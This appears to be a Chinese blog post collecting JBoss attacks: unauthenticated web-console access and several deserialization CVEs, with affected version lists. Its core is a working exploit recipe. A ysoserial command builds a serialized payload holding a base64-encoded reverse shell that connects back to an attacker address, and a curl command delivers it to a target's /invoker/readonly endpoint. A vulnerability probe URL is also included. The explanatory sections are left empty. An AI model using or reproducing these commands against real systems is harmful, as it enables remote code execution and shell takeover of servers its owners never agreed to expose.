1.jboss未授权访问
http://ip:port/web-console/
2.JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)
操作技巧:
使用payload集合包生成一个反弹shell的ser文件:
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMjEyLzIyMzMgMD4mMQ==}|{base64,-d}|{bash,-i}" >poc.ser
使用curl把这个生成的ser文件发送过去:
curl http://192.168.110.129:8080/invoker/readonly --data-binary @poc.ser
漏洞原理:
漏洞版本:5.x/6.x
3.JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
操作技巧:
poc:http://192.168.88.130:8080/jbossmq-httpil/HTTPServerILServlet 若出现This is the JBossMQ HTTP-IL则表示有漏洞
漏洞原理:
漏洞版本:JBoss AS 4.x及之前版本
4.JBoss JMXInvokerServlet 反序列化漏洞
操作技巧:类似于JBoss 5.x/6.x 反序列化漏洞
漏洞原理:
漏洞版本:
JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
JBoss AS (Wildly) 6 and earlier
JBoss A-MQ 6.2.0
JBoss Fuse 6.2.0
JBoss SOA Platform (SOA-P) 5.3.1
JBoss Data Grid (JDG) 6.5.0
JBoss BRMS (BRMS) 6.1.0
JBoss BPMS (BPMS) 6.1.0
JBoss Data Virtualization (JDV) 6.1.0
JBoss Fuse Service Works (FSW) 6.0.0
JBoss Enterprise Web Server (EWS) 2.1,3.0
jboss漏洞合集
最新推荐文章于 2024-01-23 14:53:43 发布